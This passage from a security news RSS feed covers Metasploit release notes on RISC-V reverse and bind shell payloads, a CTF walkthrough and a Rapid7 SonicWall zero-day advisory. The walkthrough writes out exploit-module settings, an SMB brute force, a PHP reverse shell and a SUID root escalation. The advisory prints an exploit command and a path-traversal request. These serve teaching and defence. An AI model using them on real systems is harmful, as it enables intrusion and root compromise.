Linux dup2 Command Shell, Bind TCP Stager</h3><p>Authors: Brendan Watters, Spencer McIntyre, and bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Payload (Stager)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21237">#21237</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Description: Adds reverse_tcp and bind_tcp stagers and a shell command stage for both RISC-V 64-bit and 32-bit little-endian Linux targets.</p><ul><li>cmd/linux/ftp/riscv32le/shell/bind_tcp</li><li>cmd/linux/http/riscv32le/shell/bind_tcp</li><li>cmd/linux/https/riscv32le/shell/bind_tcp</li><li>cmd/linux/tftp/riscv32le/shell/bind_tcp</li><li>linux/riscv32le/shell/bind_tcp</li><li>cmd/linux/ftp/riscv32le/shell/reverse_tcp</li><li>cmd/linux/http/riscv32le/shell/reverse_tcp</li><li>cmd/linux/https/riscv32le/shell/reverse_tcp</li><li>cmd/linux/tftp/riscv32le/shell/reverse_tcp</li><li>linux/riscv32le/shell/reverse_tcp</li><li>cmd/linux/ftp/riscv64le/shell/bind_tcp</li><li>cmd/linux/http/riscv64le/shell/bind_tcp</li><li>cmd/linux/https/riscv64le/shell/bind_tcp</li><li>cmd/linux/tftp/riscv64le/shell/bind_tcp</li><li>linux/riscv64le/shell/bind_tcp</li><li>cmd/linux/ftp/riscv64le/shell/reverse_tcp</li><li>cmd/linux/http/riscv64le/shell/reverse_tcp</li><li>cmd/linux/https/riscv64le/shell/reverse_tcp</li><li>cmd/linux/tftp/riscv64le/shell/reverse_tcp</li><li>linux/riscv64le/shell/reverse_tcp</li></ul><h2>Enhancements and features (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21235">#21235</a> from <a href="https://github.com/bcoles">bcoles</a> - Add four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21384">#21384</a> from <a href="https://github.com/bwatters-r7">bwatters-r7</a> - Adds Linux fetch multi payloads, a fetch server for FTP-based fetch payloads, a TFTP server to rex/proto to align with our other servers.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21599">#21599</a> from <a href="https://github.com/Pushpenderrathore">Pushpenderrathore</a> - This extends CertificateTrace functionality to also surface the server's TLS peer certificate when an HTTP module connects over HTTPS. This makes use of the same CertificateTrace enum (off/metadata/full) operators are already familiar with.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21602">#21602</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Updates the Windows service PE template to use an injected segment instead of the old substitution method.</li></ul><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21621">#21621</a> from <a href="https://github.com/eipoverflow">eipoverflow</a> - This fix a limitation on running fileless staged Meterpreter in recent OSX versions.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21670">#21670</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Marks the dynamic XOR encoders as unable to preserve registers and adds regression coverage for stage encoding when a preserved register is required.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21675">#21675</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Fix search_cache job cache generation by skipping multi arch payloads.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21677">#21677</a> from <a href="https://github.com/bwatters-r7">bwatters-r7</a> - Fixes a bug in the HTTP relay server mixin where requests matching the module's URIPATH were silently dropped instead of being relayed The fix removes the now-unnecessary URIPATH option, ensures all requests are properly relayed, and adds spec tests to cover the fix.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-07-08T13%3A32%3A18-07%3A00..2026-07-15T15%3A48%3A48-07%3A00%22">Pull Requests 6.4.143...6.4.144</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.143...6.4.144">Full diff 6.4.143...6.4.144</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Host & Network Penetration Testing: Exploitation CTF 3 — eJPT (INE)]]></title>
<description><![CDATA[A walkthrough covering ProFTPD mod_copy exploitation, local service banner grabbing, SMB brute-force with webshell upload, and SUID binary privilege escalation to capture all four flags.Hello everyone!In this blog, I’ll walk through Exploitation CTF 3 from INE’s eJPT path. Two Linux targets this ...]]></description>
<link>https://tsecurity.de/de/3675299/hacking/host-network-penetration-testing-exploitation-ctf-3-ejpt-ine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675299/hacking/host-network-penetration-testing-exploitation-ctf-3-ejpt-ine/</guid>
<pubDate>Fri, 17 Jul 2026 09:09:39 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>A walkthrough covering ProFTPD mod_copy exploitation, local service banner grabbing, SMB brute-force with webshell upload, and SUID binary privilege escalation to capture all four flags.</em></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*87U4fyepLVSRM9bGtqmnbQ.png"></figure><p>Hello everyone!</p><p>In this blog, I’ll walk through Exploitation CTF 3 from INE’s eJPT path. Two Linux targets this time — one running a vulnerable FTP service with a hidden local service, and another with a misconfigured Samba share that opens a path all the way to root.</p><p>So, let’s dive in.</p><h3>Q. A vulnerable service may be running on target1.ine.local. If exploitable, retrieve the flag from the root directory.</h3><p>As usual, I started with an Nmap scan:</p><pre>nmap -sV -sC target1.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0esbkOoRoB_2RtbiA5RC5A.png"></figure><p>Port 21 was open running <strong>ProFTPD 1.3.5</strong>, alongside port 80 (Apache). I searched for known exploits:</p><pre>searchsploit ProFTPD 1.3.5</pre><p>A Metasploit module came up immediately — exploit/unix/ftp/proftpd_modcopy_exec, which abuses the mod_copy module to execute arbitrary commands via FTP. I loaded it up and set the site path to /var/www/html — the default Apache web root on Linux — since the exploit writes a payload there to be triggered over HTTP:</p><pre>use exploit/unix/ftp/proftpd_modcopy_exec<br>set rhosts target1.ine.local<br>set sitepath /var/www/html<br>set lhost eth1<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*K2zB3Wo4YD4eFRiTKACYgA.png"></figure><p>A shell session opened. I upgraded it to Meterpreter:</p><pre>sessions -u 1</pre><p>Then listed the root directory:</p><pre>meterpreter &gt; ls /</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/931/1*iCgXij4caoCW23EhRWepQg.png"></figure><p>flag1.txt was sitting right there in the root.</p><h3>Q. Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.</h3><p>I read the flag file:</p><pre>meterpreter &gt; cat /flag1.txt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/674/1*v3_wdlMA0-lFjjny7xr6og.png"></figure><p>Along with the flag value, it contained a hint: <em>“Remember, the magical word is ‘letmein’”</em>.</p><p>The question mentioned a local network service, so I checked what was listening internally:</p><pre>meterpreter &gt; netstat</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YTpn4VegwuC0aysg0ZpMQg.png"></figure><p>Port <strong>8888</strong> was open on 127.0.0.1 — not exposed externally, only reachable from inside the machine. I dropped into a shell and connected to it with netcat:</p><pre>meterpreter &gt; shell<br>nc -nv 127.0.0.1 8888</pre><p>It prompted for a secret passphrase. I entered letmein — and it returned Flag 2 directly.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-KgH6U6iOXZPUsuKXWyhwQ.png"></figure><h3>Q. A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?</h3><p>Fresh Nmap scan on the second target:</p><pre>nmap -sV -sC target2.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*d4jYtDskVIXurPFFNQhNwg.png"></figure><p>Ports 80, 139, and 445 were open — Samba running on a Linux target. The HTTP title read <em>“Can you Pwn me?”</em> — a clear invitation. I brute-forced SMB credentials across both users and passwords:</p><pre>use auxiliary/scanner/smb/smb_login<br>set rhosts target2.ine.local<br>set user_file /usr/share/wordlists/metasploit/common_users.txt<br>set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt<br>set createsession true<br>set verbose false<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*PKSOkZ__Hrp-fpVWGLqkqg.png"></figure><p>Six accounts came back with valid credentials, all with the same password. Multiple SMB sessions opened automatically. I used the administrator session:</p><pre>sessions 8<br>shares<br>shares -i site-uploads<br>ls</pre><p>The site-uploads share was accessible and writable. The name itself was the giveaway — this share was almost certainly mapped to the web root. I uploaded a PHP reverse shell set to my IP:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*i_lZOr4nmUqskbA6wbXWoA.png"></figure><p>Set up a multi/handler listener, then triggered the shell by navigating to:</p><pre>http://target2.ine.local/site-uploads/shell.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Lh-O23_XLKJK5Dze3TSp6w.png"></figure><p>Shell came back. Listing the root / directory showed flag3.txt right there.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/947/1*vC0LfSf5aZCHXWm74C4cCA.png"></figure><h3>Q. Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?</h3><p>Still in the shell session, I upgraded to Meterpreter first:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Meqrnjx574wtEQjF1akclQ.png"></figure><p>Then dropped into a shell and searched for SUID binaries — files that run with the owner’s privileges regardless of who executes them:</p><pre>find / -type f -perm -4000 2&gt;/dev/null</pre><p>/usr/bin/find itself had the SUID bit set and was owned by root. This is a classic privilege escalation vector — if find runs as root and can execute commands, any user can spawn a root shell through it.</p><p>I checked <a href="https://gtfobins.org/">GTFOBins</a> — a community database of Unix binaries that can be abused to bypass local security restrictions — for the correct syntax:</p><pre>find . -exec /bin/sh -p \; -quit</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*iCjLaASM-_9QRWRipFiEFA.png"></figure><p>whoami returned root. Flag 4 was in /root.</p><h3>Final Thoughts</h3><p>Two techniques in this CTF are worth remembering beyond the lab.</p><p>The hidden port 8888 on target1 is a reminder that netstat inside a session reveals far more than an external Nmap scan ever will — internal services are invisible from outside and often completely unprotected because of it. Always check what's listening locally once you have a foothold.</p><p>The SUID find escalation on target2 is a textbook GTFOBins vector. The lesson isn't just about find specifically — it's about building the habit of checking for SUID binaries early in post-exploitation. And GTFOBins is the resource to bookmark: if a binary is on that list and has SUID, you likely have a path to root.</p><p>Thanks for reading!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=9815c8abdfcb" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/host-network-penetration-testing-exploitation-ctf-3-ejpt-ine-9815c8abdfcb">Host &amp; Network Penetration Testing: Exploitation CTF 3 — eJPT (INE)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Epic Games: Google kapituliert im App-Store-Streit - Golem.de]]></title>
<description><![CDATA[... IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning. E-Learning: Exklusiv: IT-Security Komplettpaket: Ethical Hacking ...]]></description>
<link>https://tsecurity.de/de/3671750/it-security-nachrichten/epic-games-google-kapituliert-im-app-store-streit-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671750/it-security-nachrichten/epic-games-google-kapituliert-im-app-store-streit-golemde/</guid>
<pubDate>Wed, 15 Jul 2026 21:53:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning. E-Learning: Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Rapid7 MDR Team Discovers New SonicWall SMA1000 Zero Days being Actively Exploited (CVE-2026-15409, CVE-2026-15410)]]></title>
<description><![CDATA[OverviewOn July 14, 2026, SonicWall published a security advisory addressing two vulnerabilities affecting SMA1000 Series remote access appliances, including the critical server-side request forgery (SSRF) vulnerability CVE-2026-15409 (CVSS 10.0) and the high-severity code injection vulnerability...]]></description>
<link>https://tsecurity.de/de/3671466/it-security-nachrichten/rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671466/it-security-nachrichten/rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410/</guid>
<pubDate>Wed, 15 Jul 2026 19:24:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Overview</h2><p><span>On July 14, 2026, SonicWall </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008" target="_blank"><span>published</span></a><span> a security advisory addressing two vulnerabilities affecting SMA1000 Series remote access appliances, including the critical server-side request forgery (SSRF) vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-15409" target="_blank"><span>CVE-2026-15409</span></a><span> (CVSS 10.0) and the high-severity code injection vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-15410" target="_blank"><span>CVE-2026-15410</span></a><span>. The advisory urges customers to immediately apply the latest platform hotfix releases.</span></p><p><span>Successful exploitation of CVE-2026-15409 permits an unauthenticated attacker to open a websocket-based tunnel to arbitrary localhost-only services, while CVE-2026-15410 is a local privilege escalation that permits an attacker with access to an internal service listening on port 8188 on localhost to execute arbitrary operating system commands as root via a malicious path traversal-based </span><span><span data-type="inlineCode">remove_hotfix</span></span><span> workflow.</span></p><p><span>Both vulnerabilities are being actively exploited in the wild. Prior to SonicWall’s official vulnerability disclosure, Rapid7’s Managed Detection and Response team observed active, targeted zero-day exploitation of internet-facing SMA 1000-series appliances. In the SonicWall advisory, exploitation in the wild was </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008#EITW" target="_blank"><span>noted</span></a><span>, and both </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15409" target="_blank"><span>CVE-2026-15409</span></a><span> and </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15410" target="_blank"><span>CVE-2026-15410</span></a><span> have been added to CISA's Known Exploited Vulnerabilities (</span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" target="_blank"><span>KEV</span></a><span>) catalog. Given the confirmed exploitation activity and the critical unauthenticated impact of the vulnerabilities, organizations should prioritize remediation of SMA1000 appliances on an emergency basis. A Python proof-of-concept for CVE-2026-15409 is available </span><a href="https://github.com/remmons-r7/rapid7-CVE-2026-15409"><span>here</span></a><span> for exposure validation, and a Metasploit module for the chain is in development.</span></p><p><span>Affected products include SonicWall SMA1000 Series models 6210, 7210, and 8200v running:</span></p><ul><li><p><span>12.4.3-03245</span></p></li><li><p><span>12.4.3-03387</span></p></li><li><p><span>12.4.3-03434 (platform-hotfix)</span></p></li><li><p><span>12.5.0-02283</span></p></li><li><p><span>12.5.0-02624</span></p></li><li><p><span>12.5.0-02800 (platform-hotfix)</span></p></li></ul><p><span>These vulnerabilities do not affect SSL VPN functionality on SonicWall firewalls or the SMA 100 Series product line.</span></p><h2>Technical overview</h2><p><span>The primary vulnerability is in a websocket proxy feature, accessed via the path /wsproxy on the affected “SonicWall WorkPlace” application (served on port 443 by default). This feature permits a netcat-like TCP tunnel to arbitrary hosts and ports, which are provided by the user in URL parameters. By providing host values that point to localhost, the attacker can access local SonicWall appliance system services behind the firewall to send and receive arbitrary TCP traffic to and from them. This is the first-stage vulnerability, CVE-2026-15409, that Rapid7 MDR analysts are seeing attackers exploiting in the wild. With this capability, an attacker can reach and exploit less-hardened services running on the appliance, such as the Erlang application on localhost:1050 or the ctrl-service application on localhost:8188. </span></p><p><span>We developed an exploit targeting the Erlang process listening on localhost:1050 for remote code execution. Note that the provided cookie value is hardcoded for the Erlang process, based on our testing, so authentication is not required to establish code execution.</span></p><pre language="html"># python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&amp;serviceType=SSH&amp;host=0.0.0.0&amp;port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'whoami &amp;&amp; id &amp;&amp; pwd &amp;&amp; hostname'
Authenticated to couchdb@127.0.0.1
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 =&gt; couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma</pre><p><span></span></p><p><span>With code execution established, the attacker can escalate to root on the appliance by exploiting CVE-2026-15410, which is a path traversal in the remove_hotfix workflow of ctrl-service. This can be performed via the web console or by hitting port 8188 on the device. The attacker provides a hotfix value containing a path traversal sequence to a malicious script, such as “../../../../var/tmp/privesc”. The system executes the script as root and (typically) reboots the appliance immediately after.</span><br><span>An example malicious request achieving privilege escalation by leveraging this from the web panel is depicted below:</span></p><pre language="html">POST /rollbackConfirm.action HTTP/1.1
Host: 192.168.181.46:8443
Cookie: EXTRAWEB_REFERER=%252F; JSESSIONID=node01bcg1tbiy6qi7s97xsoa42lhp8.node0
Content-Length: 134
Cache-Control: max-age=0
Sec-Ch-Ua: "Not?A_Brand";v="24", "Chromium";v="152"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/152.0.0.0 Safari/537.36
Origin: https://192.168.181.46:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.181.46:8443/rollbackConfirm.action
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

csrfToken=GFEJUCQBUZOLUCCOO3YBA8G30ZE9VKDP&amp;command=rollback&amp;rollbackUpgradeTime=&amp;hotfix=../../../../../tmp/1234.sh&amp;rollbackHotfixTime=</pre><p><span></span></p><p><span>If the provided hotfix file does not exist, a reboot does not occur. If the provided file exists, the system reboots after it chmods and executes the file. Below is a system monitor (pspy) depicting output of this occurring during exploitation:</span></p><pre language="html">2026/07/09 23:21:00 CMD: UID=0     PID=10355  | chmod +x /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh
2026/07/09 23:21:00 CMD: UID=0     PID=10355  | /bin/bash /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh --unattended
2026/07/09 23:21:00 CMD: UID=0     PID=10361  | /usr/bin/python3 /usr/local/ctrl-service/bin/ctrl-service.py
[...]
2026/07/09 23:21:22 CMD: UID=0     PID=11124  | shutdown -r now</pre><p><span></span></p><p><span>A Python proof-of-concept for CVE-2026-15409 is available </span><a href="https://github.com/remmons-r7/rapid7-CVE-2026-15409" target="_blank"><span>here</span></a><span>; a Metasploit module for the chain is in development.</span></p><h2>Mitigation guidance</h2><p><span>Organizations operating SonicWall SMA1000 appliances should </span><span><strong>immediately upgrade</strong></span><span> to the latest platform hotfix releases.</span></p><p><span>Fixed versions are:</span></p><table><colgroup data-width="609"><col><col></colgroup><thead><tr><th><p><span>Product</span></p></th><th><p><span>Fixed Version</span></p></th></tr></thead><tbody><tr><td><p><span>SMA1000 Series (6210, 7210, 8200v)</span></p></td><td><p><span>12.4.3-03453 (platform-hotfix) or later</span></p></td></tr><tr><td><p><span>SMA1000 Series (6210, 7210, 8200v)</span></p></td><td><p><span>12.5.0-02835 (platform-hotfix) or later</span></p></td></tr></tbody></table><p><span></span></p><p><span>There are </span><span><strong>no workarounds</strong></span><span> available.</span></p><p><span>Because active exploitation has been confirmed, organizations should not rely solely on patching. SonicWall additionally recommends:</span></p><ul><li><p><span>Performing a thorough forensic review for indicators of compromise.</span></p></li><li><p><span>Re-imaging physical appliances or redeploying virtual appliances if compromise is identified.</span></p></li><li><p><span>Changing user and administrator passwords.</span></p></li><li><p><span>Resetting TOTP tokens following confirmed compromise.</span></p></li></ul><p><span>Customers should consult the SonicWall security advisory for the latest remediation guidance and platform hotfix availability.</span></p><h2>Observed exploitation</h2><p><span>Prior to SonicWall’s official vulnerability disclosure, our Managed Detection and Response team observed active, targeted exploitation of internet-facing SMA 1000-series appliances. Threat actors were primarily leveraging the perimeter appliance as a stealthy initial access vector, executing commands on the operating system by bypassing traditional input validation controls. Once they established a foothold on the appliance, the actors systematically extracted high-value credentials, active session databases, and Time-Based One-Time Password (TOTP) multi-factor authentication (MFA) seed configurations. This local harvesting was designed to ensure long-term, persistent access that could survive standard network-level remediations.</span></p><p><span>With these harvested resources, the threat actors quickly shifted to lateral movement, pivoting from the compromised appliance directly into the internal corporate network. Specifically, we observed a sequence of anomalous, VPN-less Active Directory authentications targeting core domain controllers. These authentications originated directly from the appliance’s internal IP address, using atypical, non-corporate workstation client names (such as kali or other non-inventory hostnames) under the context of the appliance’s integrated LDAP service account. This unique behavior of direct, machine-level lateral movement with no corresponding active VPN tunnel confirmed that the appliance itself had been fully compromised and was acting as an unmonitored backdoor into the corporate directory infrastructure.</span></p><h2>Artifacts or evidence sources and IOCs</h2><p><span>Rapid7 recommends reviewing appliance logs for evidence of active exploitation, including the following characteristic behaviors and specific log indicators:</span></p><h3><span>Characteristic Behaviors</span></h3><ul><li><p><span><strong>Websocket exploit IOC log patterns:</strong></span><span> extraweb_access.log entries containing the strings ("GET" AND "wsproxy" AND "=-3389" AND “ 101 “) indicate interactions with the niche affected service. If suspicious host parameter values such as “0.0.0.0”, “localhost”, or “::ffff:127.0.0.1” are present, that’s indicative of likely exploitation of CVE-2026-15409. Note that “serviceType=SSH” was used in our published materials, but options such as “serviceType=TELNET” are viable alternatives.</span></p></li><li><p><span><strong>Hotfix removal exploit IOC log patterns:</strong></span><span> The ctrl-service.log shows the hotfix-removal utility (/usr/local/bin/remove_hotfix) being invoked with traversal sequences pointing to attacker-staged shell script payloads (e.g., ../../../../../../tmp/sma1000_5c47.sh). This is indicative of successful exploitation of CVE-2026-15410.</span></p></li><li><p><span><strong>Internet-facing probing:</strong></span><span> Enumeration of the SMA portal, including repeated requests to /auth1.html, path-traversal attempts, and generic file/enumeration requests (e.g., /.env, /api/sonicos/is-sslvpn-enabled).</span></p></li><li><p><span><strong>Authentication activity:</strong></span><span> Authentication-API activity against /__api__/logon/&lt;session-id&gt;/authenticate.</span></p></li><li><p><span><strong>Sensitive path access:</strong></span><span> Access to sensitive appliance paths such as /tmp/temp.db*, consistent with theft of stored session data.</span></p></li><li><p><span><strong>AD/Service Account Compromise:</strong></span><span> NTLM logons (Windows Event ID 4624, logon type 3) into internal domain controllers sourced from the appliance's internal IP address, using attacker-controlled workstation names (e.g., kali) without a corresponding VPN session.</span></p></li></ul><ul><li><p><span><strong>extraweb_access.log:</strong></span><span> Requests to /__api__/login or /__api__/logout returning HTTP 200, and requests to /wsproxy containing suspicious host parameters returning HTTP 101.</span></p></li></ul><h3><span>Configuration artifacts</span></h3><ul><li><p><span>/var/lib/unit/conf.json containing routes for /__api__/login or /__api__/logout, which are not present in legitimate configurations.</span></p></li></ul><h3><span>Atomic Indicators</span></h3><ul><li><p><span><strong>F.N.S Holdings Limited (ASN - 206092): </strong></span><span>The threat actor(s) utilized varying IP addresses, but they belonged to the VPN hosting provider FNS Holdings Limited. Limit or block access to FNS Holdings Limited if there is no business need. For reference, the IP addresses we observed were:</span></p></li><ul><li><p><span>45.131.194.0/24</span></p></li><li><p><span>45.146.54.0/24</span></p></li><li><p><span>63.135.161.0/24</span></p></li><li><p><span>173.239.211.0/24</span></p></li><li><p><span>193.37.32[.]179</span></p></li><li><p><span>193.37.32[.]214</span></p></li><li><p><span>216.73.163[.]151</span></p></li><li><p><span>216.73.163[.]158</span></p></li></ul></ul><p><span>If any indicators of compromise are identified, organizations should treat the appliance as compromised and follow SonicWall’s recovery guidance.</span></p><h2>Rapid7 customers</h2><p><span>Organizations should prioritize identifying all internet-facing SonicWall SMA1000 appliances and determine whether affected software versions remain deployed. Given SonicWall’s and Rapid7’s confirmation of active exploitation, exposed appliances should be considered high-priority assets for remediation.</span></p><p><span>Security teams should also review available authentication, web access, and appliance management logs for the indicators published by SonicWall to determine whether follow-up incident response activities are warranted.</span></p><h3>Exposure Command, InsightVM, and Nexpose</h3><p><span>Exposure Command, InsightVM, and Nexpose customers will be able to assess exposure to </span><span><strong>CVE-2026-15409</strong></span><span> and </span><span><strong>CVE-2026-15410</strong></span><span> with authenticated vulnerability checks available in the July 15 content release.</span></p><h2>Updates</h2><p><span><strong>July 15, 2026:</strong></span><span> Initial publication.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Proaktive IT-Security mit Pentesting – Ethical Hacking für Admins | heise online]]></title>
<description><![CDATA[Ein besonderer Fokus liegt auf dem Exploit-Framework Metasploit, mit dem Hacker identifizierte Schwachstellen gezielt ausnutzen. Härtung interner und ...]]></description>
<link>https://tsecurity.de/de/3668216/hacking/proaktive-it-security-mit-pentesting-ethical-hacking-fuer-admins-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668216/hacking/proaktive-it-security-mit-pentesting-ethical-hacking-fuer-admins-heise-online/</guid>
<pubDate>Tue, 14 Jul 2026 16:09:29 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein besonderer Fokus liegt auf dem Exploit-Framework Metasploit, mit dem <b>Hacker</b> identifizierte Schwachstellen gezielt ausnutzen. Härtung interner und ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Hungry? We talk Smoked Meat, Poutine, and Bagel - also, Identiverse Interviews! - John Pritchard, Cassie Christensen, Jaime Lewis-Gross, François Proulx, Kim Brown - ESW #467]]></title>
<description><![CDATA[Interview with François Proulx from Boost Security Software Supply Chain Security: Build Pipeline (CI/CD) Exploitation Boost Security is the creator of some very popular build pipeline security tools, like Bagel and Poutine. Today, we discuss their latest tool, Smoked Meat. They describe it as "L...]]></description>
<link>https://tsecurity.de/de/3664752/it-security-nachrichten/hungry-we-talk-smoked-meat-poutine-and-bagel-also-identiverse-interviews-john-pritchard-cassie-christensen-jaime-lewis-gross-franois-proulx-kim-brown-esw-467/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664752/it-security-nachrichten/hungry-we-talk-smoked-meat-poutine-and-bagel-also-identiverse-interviews-john-pritchard-cassie-christensen-jaime-lewis-gross-franois-proulx-kim-brown-esw-467/</guid>
<pubDate>Mon, 13 Jul 2026 11:21:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Interview with François Proulx from Boost Security</h3> <p><strong>Software Supply Chain Security: Build Pipeline (CI/CD) Exploitation</strong></p> <p>Boost Security is the creator of some very popular build pipeline security tools, like Bagel and Poutine. Today, we discuss their latest tool, Smoked Meat. They describe it as "Like Metasploit, but for CI/CD pipelines".</p> <p>Segment Resources:</p> <ul> <li>Smoked Meat <a rel="noopener" target="_blank" href="https://labs.boostsecurity.io/articles/introducing-smokedmeat">announcement</a></li> <li>Smoked Meat <a rel="noopener" target="_blank" href="https://github.com/boostsecurityio/smokedmeat">github</a></li> <li>Smoked <a rel="noopener" target="_blank" href="https://www.youtube.com/watch?v=F5Hr_201Au8">Meat demo</a> with Guillaume and François</li> </ul> <h3>Identiverse Interview with Dr. John Prichard from Radiant Logic</h3> <p><strong>The Three Identity Problem: Surviving Identity Security's Chaotic Era</strong></p> <p>Identity security has entered its chaotic era. Human, non-human, and agentic AI identities no longer just coexist. They form an uncontrolled inheritance chain in which a human creates an agent, the agent spins up service principals, OAuth grants, and role assignments, and that whole chain keeps running long after the human changes roles or leaves. Most of these chains are being spawned by business users on low-code and enterprise AI platforms, outside traditional identity controls and largely invisible to security.</p> <p>In this segment, Radiant Logic CEO Dr. John Pritchard joins us to unpack why this is no longer a visibility problem. It is an observability problem. And it is shifting the center of gravity in identity security from authentication to authorization. Listeners will leave with a clearer view of where their current IAM, IGA, and NHI programs fall short, and a practical lens for governing the rapidly expanding population of AI agents already inside their environments.</p> <p>To go deeper on what John discussed today, watch Radiant Logic's on-demand webinar Identities Under Attack: How Adversaries Exploit the Human-Machine-Agent Divide at <a rel="noopener" target="_blank" href="https://securityweekly.com/radiantlogicidv">https://securityweekly.com/radiantlogicidv</a>.</p> <h3>Identiverse Interview with Cassie Christensen from Saviynt</h3> <p><strong>Everyone Wants an AI 